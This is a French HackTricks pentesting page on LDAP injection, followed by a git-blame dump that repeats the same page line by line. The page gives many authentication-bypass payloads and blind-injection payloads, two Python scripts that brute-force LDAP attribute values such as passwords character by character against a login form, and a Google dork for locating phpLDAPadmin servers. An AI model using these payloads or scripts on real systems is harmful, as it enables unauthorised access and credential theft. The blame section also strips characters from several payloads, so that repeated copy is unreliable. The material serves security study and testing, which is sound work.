hacktricks/pentesting-web/ldap-injection.md

# Injection LDAP

## Injection LDAP

<details>

<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>

Autres façons de soutenir HackTricks :

* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.

</details>

<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**Astuce de prime de bug** : **inscrivez-vous** à **Intigriti**, une plateforme de prime de bug premium créée par des pirates informatiques, pour les pirates informatiques ! Rejoignez-nous sur [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) aujourd'hui, et commencez à gagner des primes allant jusqu'à **100 000 $** !

{% embed url="https://go.intigriti.com/hacktricks" %}

## Injection LDAP

### **LDAP**

**Si vous voulez savoir ce qu'est LDAP, accédez à la page suivante :**

{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)
{% endcontent-ref %}

**L'injection LDAP** est une attaque ciblant les applications web qui construisent des déclarations LDAP à partir de l'entrée de l'utilisateur. Cela se produit lorsque l'application **ne parvient pas à nettoyer correctement** l'entrée, permettant aux attaquants de **manipuler les déclarations LDAP** via un proxy local, ce qui peut potentiellement conduire à un accès non autorisé ou à une manipulation de données.

{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}

**Filtre** = ( filtercomp )\
**Filtercomp** = and / or / not / item\
**And** = & filterlist\
**Or** = |filterlist\
**Not** = ! filter\
**Filterlist** = 1\*filter\
**Item**= simple / present / substring\
**Simple** = attr filtertype assertionvalue\
**Filtertype** = _'=' / '\~=' / '>=' / '<='_\
**Present** = attr = \*\
**Substring** = attr ”=” \[initial] \* \[final]\
**Initial** = assertionvalue\
**Final** = assertionvalue\
**(&)** = VRAI absolu\
**(|)** = FAUX absolu

Par exemple :\
`(&(!(objectClass=Impresoras))(uid=s*))`\
`(&(objectClass=user)(uid=*))`

Vous pouvez accéder à la base de données, qui peut contenir des informations de différents types.

**OpenLDAP** : Si 2 filtres arrivent, n'exécute que le premier.\
**ADAM ou Microsoft LDS** : Avec 2 filtres, ils renvoient une erreur.\
**SunOne Directory Server 5.0** : Exécute les deux filtres.

**Il est très important d'envoyer le filtre avec une syntaxe correcte, sinon une erreur sera renvoyée. Il est préférable d'envoyer un seul filtre.**

Le filtre doit commencer par : `&` ou `|`\
Exemple : `(&(directory=val1)(folder=public))`

`(&(objectClass=VALUE1)(type=Epson*))`\
`VALUE1 = *)(ObjectClass=*))(&(objectClass=void`

Ensuite : `(&(objectClass=`**`*)(ObjectClass=*))`** sera le premier filtre (celui exécuté).

### Contournement de connexion

LDAP prend en charge plusieurs formats pour stocker le mot de passe : clair, md5, smd5, sh1, sha, crypt. Ainsi, il se pourrait qu'indépendamment de ce que vous insérez dans le mot de passe, il soit haché.
```bash
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
```

```bash
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
```

```bash
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
```

```bash
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
```

```bash
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
```

```bash
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
```

```bash
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
```

```bash
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
```

```bash
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
```
#### Listes

* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_FUZZ.txt)
* [Attributs LDAP](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)
* [Attributs LDAP PosixAccount](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)

### Injection LDAP Aveugle

Vous pouvez forcer de fausses ou de vraies réponses pour vérifier si des données sont renvoyées et confirmer une possible Injection LDAP Aveugle:
```bash
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
```

```bash
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```
#### Extraire des données

Vous pouvez itérer sur les lettres ASCII, les chiffres et les symboles :
```bash
(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
```
#### **Découvrir les champs LDAP valides**

Les objets LDAP **contiennent par défaut plusieurs attributs** qui pourraient être utilisés pour **sauvegarder des informations**. Vous pouvez essayer de **forcer tous ces attributs pour extraire ces informations**. Vous pouvez trouver une liste des [**attributs LDAP par défaut ici**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt).
```python
#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break

if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()
```
#### **Injection LDAP aveugle spéciale (sans "\*")**
```python
#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break
```
### Google Dorks

### Dorks Google
```bash
intitle:"phpLDAPadmin" inurl:cmd.php
```
### Plus de charges utiles

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}

<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**Conseil de prime de bug**: **inscrivez-vous** sur **Intigriti**, une plateforme de prime de bug premium créée par des hackers, pour des hackers! Rejoignez-nous sur [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) aujourd'hui, et commencez à gagner des primes allant jusqu'à **100 000 $**!

{% embed url="https://go.intigriti.com/hacktricks" %}

<details>

<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>

Autres façons de soutenir HackTricks:

* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts github.

</details>
Translated to French 2023-06-03 13:10:46 +00:00			`# Injection LDAP`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`## Injection LDAP`
GitBook: [#3183] No subject 2022-05-07 13:38:40 +00:00
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Autres façons de soutenir HackTricks :`
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 16:06:20 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`* Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop) !`
			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Découvrez [La famille PEASS](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFT](https://opensea.io/collection/the-peass-family)`
			`* Rejoignez le 💬 [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou suivez moi sur Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Partagez vos astuces de piratage en soumettant des PR aux [HackTricks](https://github.com/carlospolop/hacktricks) et [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

change logo 2022-07-21 20:26:09 +00:00			`<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Astuce de prime de bug : inscrivez-vous à Intigriti, une plateforme de prime de bug premium créée par des pirates informatiques, pour les pirates informatiques ! Rejoignez-nous sur [https://go.intigriti.com/hacktricks](https://go.intigriti.com/hacktricks) aujourd'hui, et commencez à gagner des primes allant jusqu'à 100 000 $ !`
GitBook: [#3157] No subject 2022-04-30 20:31:18 +00:00
			`{% embed url="https://go.intigriti.com/hacktricks" %}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`## Injection LDAP`
GitBook: [#3157] No subject 2022-04-30 20:31:18 +00:00
GitBook: [#3183] No subject 2022-05-07 13:38:40 +00:00			`### LDAP`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Si vous voulez savoir ce qu'est LDAP, accédez à la page suivante :`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}`
			`[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`{% endcontent-ref %}`
GitBook: [master] 3 pages and one asset modified 2021-06-08 20:38:29 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`L'injection LDAP est une attaque ciblant les applications web qui construisent des déclarations LDAP à partir de l'entrée de l'utilisateur. Cela se produit lorsque l'application ne parvient pas à nettoyer correctement l'entrée, permettant aux attaquants de manipuler les déclarations LDAP via un proxy local, ce qui peut potentiellement conduire à un accès non autorisé ou à une manipulation de données.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GITBOOK-3777: No subject 2023-02-14 11:55:05 +00:00			`{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Filtre = ( filtercomp )\`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`Filtercomp = and / or / not / item\`
			`And = & filterlist\`
			`Or = \|filterlist\`
			`Not = ! filter\`
			`Filterlist = 1\*filter\`
			`Item= simple / present / substring\`
			`Simple = attr filtertype assertionvalue\`
			`Filtertype = _'=' / '\~=' / '>=' / '<='_\`
			`Present = attr = \*\`
			`Substring = attr ”=” \[initial] \* \[final]\`
			`Initial = assertionvalue\`
			`Final = assertionvalue\`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`(&) = VRAI absolu\`
			`(\|) = FAUX absolu`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Par exemple :\`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`(&(!(objectClass=Impresoras))(uid=s*))`\
			`(&(objectClass=user)(uid=*))`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Vous pouvez accéder à la base de données, qui peut contenir des informations de différents types.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`OpenLDAP : Si 2 filtres arrivent, n'exécute que le premier.\`
			`ADAM ou Microsoft LDS : Avec 2 filtres, ils renvoient une erreur.\`
Translated to French 2023-06-03 13:10:46 +00:00			`SunOne Directory Server 5.0 : Exécute les deux filtres.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Il est très important d'envoyer le filtre avec une syntaxe correcte, sinon une erreur sera renvoyée. Il est préférable d'envoyer un seul filtre.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			Le filtre doit commencer par : `&` ou `\|`\
			Exemple : `(&(directory=val1)(folder=public))`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`(&(objectClass=VALUE1)(type=Epson*))`\
			`VALUE1 = )(ObjectClass=))(&(objectClass=void`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			Ensuite : `(&(objectClass=`*`)(ObjectClass=))`* sera le premier filtre (celui exécuté).
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`### Contournement de connexion`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`LDAP prend en charge plusieurs formats pour stocker le mot de passe : clair, md5, smd5, sh1, sha, crypt. Ainsi, il se pourrait qu'indépendamment de ce que vous insérez dans le mot de passe, il soit haché.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`user=*`
			`password=*`
			`--> (&(user=)(password=))`
			`# The asterisks are great in LDAPi`
			```

			```bash
			`user=*)(&`
			`password=*)(&`
			`--> (&(user=)(&)(password=)(&))`
			```

			```bash
			`user=*)(\|(&`
			`pass=pwd)`
			`--> (&(user=*)(\|(&)(pass=pwd))`
			```

			```bash
			`user=)(\|(password=`
			`password=test)`
			`--> (&(user=)(\|(password=)(password=test))`
			```

			```bash
			`user=*))%00`
			`pass=any`
			`--> (&(user=*))%00 --> Nothing more is executed`
			```

			```bash
			`user=admin)(&)`
			`password=pwd`
			`--> (&(user=admin)(&))(password=pwd) #Can through an error`
			```

			```bash
			`username = admin)(!(&(\|`
			`pass = any))`
GitBook: [master] 2 pages and 4 assets modified 2021-06-08 21:58:39 +00:00			`--> (&(uid= admin)(!(& (\|) (webpassword=any)))) —> As (\|) is FALSE then the user is admin and the password check is True.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```

			```bash
			`username=*`
			`password=*)(&`
			`--> (&(user=)(password=)(&))`
			```

			```bash
			`username=admin))(\|(\|`
			`password=any`
			`--> (&(uid=admin)) (\| (\|) (webpassword=any))`
			```
Translated to French 2023-06-03 13:10:46 +00:00			`#### Listes`
GitBook: [master] 2 pages and 4 assets modified 2021-06-08 21:58:39 +00:00
GitBook: [#3157] No subject 2022-04-30 20:31:18 +00:00			`* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_FUZZ.txt)`
Translated to French 2023-06-03 13:10:46 +00:00			`* [Attributs LDAP](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`* [Attributs LDAP PosixAccount](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`### Injection LDAP Aveugle`
GitBook: [master] 2 pages and 4 assets modified 2021-06-08 21:58:39 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Vous pouvez forcer de fausses ou de vraies réponses pour vérifier si des données sont renvoyées et confirmer une possible Injection LDAP Aveugle:`
GitBook: [master] 2 pages and 4 assets modified 2021-06-08 21:58:39 +00:00			```bash
			`#This will result on True, so some information will be shown`
			`Payload: )(objectClass=))(&objectClass=void`
			`Final query: (&(objectClass= )(objectClass=))(&objectClass=void )(type=Pepi*))`
			```

			```bash
			`#This will result on True, so no information will be returned or shown`
			`Payload: void)(objectClass=void))(&objectClass=void`
			`Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))`
			```
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 16:06:20 +00:00			`#### Extraire des données`
GitBook: [master] 2 pages and 4 assets modified 2021-06-08 21:58:39 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Vous pouvez itérer sur les lettres ASCII, les chiffres et les symboles :`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`(&(sn=administrator)(password=*)) : OK`
			`(&(sn=administrator)(password=A*)) : KO`
			`(&(sn=administrator)(password=B*)) : KO`
			`...`
			`(&(sn=administrator)(password=M*)) : OK`
			`(&(sn=administrator)(password=MA*)) : KO`
			`(&(sn=administrator)(password=MB*)) : KO`
			`...`
			```
Translated to French 2023-06-03 13:10:46 +00:00			`#### Découvrir les champs LDAP valides`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Les objets LDAP contiennent par défaut plusieurs attributs qui pourraient être utilisés pour sauvegarder des informations. Vous pouvez essayer de forcer tous ces attributs pour extraire ces informations. Vous pouvez trouver une liste des [attributs LDAP par défaut ici](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt).`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```python
			`#!/usr/bin/python3`
			`import requests`
			`import string`
			`from time import sleep`
			`import sys`

			`proxy = { "http": "localhost:8080" }`
			`url = "http://10.10.10.10/login.php"`
			`alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"`

			`attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]`

			`for attribute in attributes: #Extract all attributes`
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 16:06:20 +00:00			`value = ""`
			`finish = False`
			`while not finish:`
			`for char in alphabet: #In each possition test each possible printable char`
			`query = f")({attribute}={value}{char}"`
			`data = {'login':query, 'password':'bla'}`
			`r = requests.post(url, data=data, proxies=proxy)`
			`sys.stdout.write(f"\r{attribute}: {value}{char}")`
			`#sleep(0.5) #Avoid brute-force bans`
			`if "Cannot login" in r.text:`
			`value += str(char)`
			`break`

			`if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value`
			`finish = True`
			`print()`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```
Translated to French 2023-06-03 13:10:46 +00:00			`#### *Injection LDAP aveugle spéciale (sans "\")**`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```python
			`#!/usr/bin/python3`

			`import requests, string`
			`alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"`

			`flag = ""`
			`for i in range(50):`
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 16:06:20 +00:00			`print("[i] Looking for number " + str(i))`
			`for char in alphabet:`
			`r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)`
			`if ("TRUE CONDITION" in r.text):`
			`flag += char`
			`print("[+] Flag: " + flag)`
			`break`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```
GitBook: [#3183] No subject 2022-05-07 13:38:40 +00:00			`### Google Dorks`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00
			`### Dorks Google`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`intitle:"phpLDAPadmin" inurl:cmd.php`
			```
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`### Plus de charges utiles`
GitBook: [master] 2 pages and 4 assets modified 2021-06-08 21:58:39 +00:00
GitBook: [#3193] No subject 2022-05-08 22:42:39 +00:00			`{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}`

change logo 2022-07-21 20:26:09 +00:00			`<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Conseil de prime de bug: inscrivez-vous sur Intigriti, une plateforme de prime de bug premium créée par des hackers, pour des hackers! Rejoignez-nous sur [https://go.intigriti.com/hacktricks](https://go.intigriti.com/hacktricks) aujourd'hui, et commencez à gagner des primes allant jusqu'à 100 000 $!`
GitBook: [#3193] No subject 2022-05-08 22:42:39 +00:00
			`{% embed url="https://go.intigriti.com/hacktricks" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>`
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 16:06:20 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Autres façons de soutenir HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['forensics/basic-forensic-methodology/windows-forensics/READ 2024-02-03 16:06:20 +00:00			`* Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop)!`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Découvrez [La famille PEASS](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFT](https://opensea.io/collection/the-peass-family)`
			`* Rejoignez le 💬 [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou suivez moi sur Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Partagez vos astuces de piratage en soumettant des PR aux [HackTricks](https://github.com/carlospolop/hacktricks) et [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) dépôts github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`